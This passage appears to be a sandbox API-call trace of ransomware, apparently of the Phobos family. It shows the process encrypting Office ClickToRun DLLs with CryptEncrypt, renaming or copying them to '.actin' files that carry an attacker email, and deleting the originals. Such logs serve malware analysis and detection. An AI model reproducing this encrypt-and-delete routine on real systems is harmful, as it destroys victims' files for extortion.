phKey=0x37afe64*=0xf71b40) returned 1 [0068.556] CryptSetKeyParam (hKey=0xf71b40, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0068.556] ReadFile (in: hFile=0x320, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x60c0, lpOverlapped=0x0) returned 1 [0068.557] CryptEncrypt (in: hKey=0xf71b40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x60d0, dwBufLen=0x60d0 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x60d0) returned 1 [0068.557] WriteFile (in: hFile=0x268, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x60d0, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x60d0, lpOverlapped=0x0) returned 1 [0068.558] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71d00) returned 1 [0068.558] CryptSetKeyParam (hKey=0xf71d00, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0068.558] CryptEncrypt (in: hKey=0xf71d00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x60, dwBufLen=0x60 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x60) returned 1 [0068.558] CryptDestroyKey (hKey=0xf71d00) returned 1 [0068.558] WriteFile (in: hFile=0x268, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x112, lpOverlapped=0x0) returned 1 [0068.558] CryptDestroyKey (hKey=0xf71b40) returned 1 [0068.558] CloseHandle (hObject=0x320) returned 1 [0068.558] CloseHandle (hObject=0x268) returned 1 [0068.560] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-stdio-l1-1-0.dll")) returned 1 [0068.561] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0068.561] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-string-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268 [0068.561] GetFileSizeEx (in: hFile=0x268, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=24768) returned 1 [0068.561] CloseHandle (hObject=0x268) returned 1 [0068.561] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-string-l1-1-0.dll")) returned 0x20 [0068.561] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-string-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0068.561] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-string-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268 [0068.561] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0068.562] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0068.562] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-string-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0068.562] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf72180) returned 1 [0068.562] CryptSetKeyParam (hKey=0xf72180, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0068.562] ReadFile (in: hFile=0x268, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x60c0, lpOverlapped=0x0) returned 1 [0068.719] CryptEncrypt (in: hKey=0xf72180, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x60d0, dwBufLen=0x60d0 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x60d0) returned 1 [0068.719] WriteFile (in: hFile=0x320, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x60d0, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x60d0, lpOverlapped=0x0) returned 1 [0068.720] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71e40) returned 1 [0068.720] CryptSetKeyParam (hKey=0xf71e40, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0068.720] CryptEncrypt (in: hKey=0xf71e40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x70, dwBufLen=0x70 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x70) returned 1 [0068.720] CryptDestroyKey (hKey=0xf71e40) returned 1 [0068.720] WriteFile (in: hFile=0x320, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x122, lpOverlapped=0x0) returned 1 [0068.720] CryptDestroyKey (hKey=0xf72180) returned 1 [0068.720] CloseHandle (hObject=0x268) returned 1 [0068.720] CloseHandle (hObject=0x320) returned 1 [0068.722] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-string-l1-1-0.dll")) returned 1 [0068.723] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0068.723] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVFileSystemMetadata.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvfilesystemmetadata.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0068.723] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=307416) returned 1 [0068.723] CloseHandle (hObject=0x320) returned 1 [0068.723] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVFileSystemMetadata.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvfilesystemmetadata.dll")) returned 0x20 [0068.724] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVFileSystemMetadata.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvfilesystemmetadata.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0068.724] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVFileSystemMetadata.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvfilesystemmetadata.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0068.724] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0068.724] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvintegration.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0068.724] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=2118360) returned 1 [0068.724] CloseHandle (hObject=0x320) returned 1 [0068.724] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvintegration.dll")) returned 0x20 [0068.724] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvintegration.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvintegration.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 1 [0068.725] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvintegration.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0068.725] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvintegration.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvintegration.dll")) returned 1 [0068.726] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0068.726] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvApi.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0068.726] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=468696) returned 1 [0068.726] CloseHandle (hObject=0x320) returned 1 [0068.726] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvApi.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvapi.dll")) returned 0x20 [0068.726] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvApi.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvapi.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0068.726] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvApi.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvapi.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0068.726] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0068.726] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0068.727] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=396960) returned 1 [0068.727] CloseHandle (hObject=0x320) returned 1 [0068.727] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll")) returned 0x20 [0068.727] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0068.727] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0068.727] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0068.727] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0068.727] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268 [0068.727] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71c40) returned 1 [0068.727] CryptSetKeyParam (hKey=0xf71c40, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0068.727] ReadFile (in: hFile=0x320, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x60ea0, lpOverlapped=0x0) returned 1 [0068.731] CryptEncrypt (in: hKey=0xf71c40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x60eb0, dwBufLen=0x60eb0 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x60eb0) returned 1 [0068.731] WriteFile (in: hFile=0x268, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x60eb0, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x60eb0, lpOverlapped=0x0) returned 1 [0068.738] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71b40) returned 1 [0068.738] CryptSetKeyParam (hKey=0xf71b40, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0068.738] CryptEncrypt (in: hKey=0xf71b40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50, dwBufLen=0x50 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50) returned 1 [0068.739] CryptDestroyKey (hKey=0xf71b40) returned 1 [0068.739] WriteFile (in: hFile=0x268, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x102, lpOverlapped=0x0) returned 1 [0068.739] CryptDestroyKey (hKey=0xf71c40) returned 1 [0068.739] CloseHandle (hObject=0x320) returned 1 [0068.739] CloseHandle (hObject=0x268) returned 1 [0068.747] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll")) returned 1 [0068.751] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0068.751] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream64.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268 [0068.751] GetFileSizeEx (in: hFile=0x268, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=473760) returned 1 [0068.751] CloseHandle (hObject=0x268) returned 1 [0068.751] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream64.dll")) returned 0x20 [0068.751] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream64.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0068.751] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream64.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0068.752] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0068.752] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstreamingmanager.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268 [0068.752] GetFileSizeEx (in: hFile=0x268, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=210648) returned 1 [0068.752] CloseHandle (hObject=0x268) returned 1 [0068.752] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstreamingmanager.dll")) returned 0x20 [0068.752] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstreamingmanager.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0068.752] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstreamingmanager.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0068.752] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0068.752] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystemcontroller.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268 [0068.752] GetFileSizeEx (in: hFile=0x268, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=1402584) returned 1 [0068.753] CloseHandle (hObject=0x268) returned 1 [0068.753] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystemcontroller.dll")) returned 0x20 [0068.753] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystemcontroller.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0068.753] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystemcontroller.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0068.753] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0068.753] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268 [0068.753] GetFileSizeEx (in: hFile=0x268, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=1761448) returned 1 [0068.753] CloseHandle (hObject=0x268) returned 1 [0068.753] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll")) returned 0x20 [0068.753] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 1 [0068.754] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268 [0068.754] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe20 | out: lpNewFilePointer=0x0) returned 1 [0068.754] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe20 | out: lpNewFilePointer=0x0) returned 1 [0068.754] ReadFile (in: hFile=0x268, lpBuffer=0x3b30058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x37afe2c, lpOverlapped=0x0 | out: lpBuffer=0x3b30058*, lpNumberOfBytesRead=0x37afe2c*=0x40000, lpOverlapped=0x0) returned 1 [0069.374] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x8f58d, lpNewFilePointer=0x0, dwMoveMethod=0x37afe20 | out: lpNewFilePointer=0x0) returned 1 [0069.374] ReadFile (in: hFile=0x268, lpBuffer=0x3b70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x37afe2c, lpOverlapped=0x0 | out: lpBuffer=0x3b70058*, lpNumberOfBytesRead=0x37afe2c*=0x40000, lpOverlapped=0x0) returned 1 [0069.377] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x16e0a8, lpNewFilePointer=0x0, dwMoveMethod=0x37afe20 | out: lpNewFilePointer=0x0) returned 1 [0069.377] ReadFile (in: hFile=0x268, lpBuffer=0x3bb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x37afe2c, lpOverlapped=0x0 | out: lpBuffer=0x3bb0058*, lpNumberOfBytesRead=0x37afe2c*=0x40000, lpOverlapped=0x0) returned 1 [0069.382] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe10, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe7c | out: phKey=0x37afe7c*=0xf72100) returned 1 [0069.382] CryptSetKeyParam (hKey=0xf72100, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0069.382] CryptEncrypt (in: hKey=0xf72100, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe30*=0xc0070, dwBufLen=0xc0070 | out: pbData=0x3b30020*, pdwDataLen=0x37afe30*=0xc0070) returned 1 [0069.383] CryptDestroyKey (hKey=0xf72100) returned 1 [0069.383] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe58 | out: lpNewFilePointer=0x0) returned 1 [0069.383] WriteFile (in: hFile=0x268, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xc0122, lpNumberOfBytesWritten=0x37afe68, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe68*=0xc0122, lpOverlapped=0x0) returned 1 [0069.407] SetEndOfFile (hFile=0x268) returned 1 